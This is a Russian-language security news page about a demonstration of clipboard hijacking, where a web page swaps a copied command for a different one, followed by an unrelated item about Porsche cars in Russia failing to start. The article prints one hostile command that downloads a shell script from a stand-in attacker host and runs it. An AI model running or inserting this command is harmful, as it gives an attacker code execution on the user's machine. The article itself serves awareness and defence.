Эксперт показал подмену скопированной на веб-странице команды

Эксперт показал подмену скопированной на веб-странице команды

Эксперт показал подмену скопированной на веб-странице команды

Ряд программистов, системных администраторов и исследователей привыкли копировать определённые куски кода на веб-страницах, а затем вставлять их, например, в консоль или терминал. Как оказалось, это пагубная практика, которая может привести к негативным для устройства последствиям.

Габриэль Фридлендер, основатель платформы для обучения основам кибербезопасности — Wizer, показал очевидный, но при этом интересный приём, который заставит по-новому взглянуть на процесс копирования-вставки с веб-страниц.

Суть в том, что при копировании страница может незаметно подменить содержимое буфера обмена, что приведёт к использованию совершенно другой команды на устройстве пользователя. Поскольку как новички, так и уже опытные сисадмины привыкли иногда «копипастить» код (характерный пример — со StackOverflow), будет полезно помнить про описанную Фридлендером технику.

Специалист даже опубликовал в блоге тривиальный демонстрационный код (proof-of-concept, PoC) и просит читателей попробовать скопировать простейшую команду, с которой знакомо подавляющее большинство системных администраторов:

 

После вставки скопированной команды в любой текстовый редактор пользователь увидит совершенно другое:

curl http://attacker-domain:8000/shell.sh | sh

Примечательно, что при вставке этой команды в терминал Linux она моментально выполнится, что создаёт ещё больший риск, ведь пользователь даже не успеет проверить корректность введённых данных.

Как пояснил Фридлендер, суть трюка кроется в JavaScript-коде, размещённом на демонстрационной странице:

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

В России окирпичились сотни автомобилей Porshe

Российские владельцы автомобилей Porsche столкнулись с массовой проблемой — машины неожиданно перестают заводиться. По данным дилеров, причина связана со сбоем в работе коммуникационных систем, однако не исключены и неполадки в системах безопасности. Количество подобных случаев уже исчисляется сотнями, и инциденты фиксируются по всей стране.

О ситуации сообщило издание Naavtotrasse со ссылкой на источники на автомобильном рынке.

Не исключено, что часть владельцев пока не обращалась к дилерам, поэтому масштабы проблемы могут быть выше.

На данный момент единственный способ «оживить» автомобиль своими силами — полностью отключить аккумулятор как минимум на 10 часов. Быстро решить проблему без помощи официального сервисного центра не удаётся. Официальных комментариев от Porsche пока не последовало.

Похожая ситуация уже возникала в июне, когда владельцы китайских электромобилей Lixiang, ввезённых по «серым» схемам, столкнулись с аналогичными сбоями. Разблокировка через неофициальные каналы оказалась дорогой и далеко не всегда успешной.

В целом, по данным исследования АО «ГЛОНАСС», за первые восемь месяцев 2025 года число атак на автомобили в России выросло на 20%. Более чем в 90% случаев речь идёт об удалённом воздействии.

Основной целью злоумышленников являлось дистанционное управление транспортом или его угон. В конце ноября АО «ГЛОНАСС» выявило ряд опасных уязвимостей в бортовых системах электробусов и высокоавтоматизированных грузовиков.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru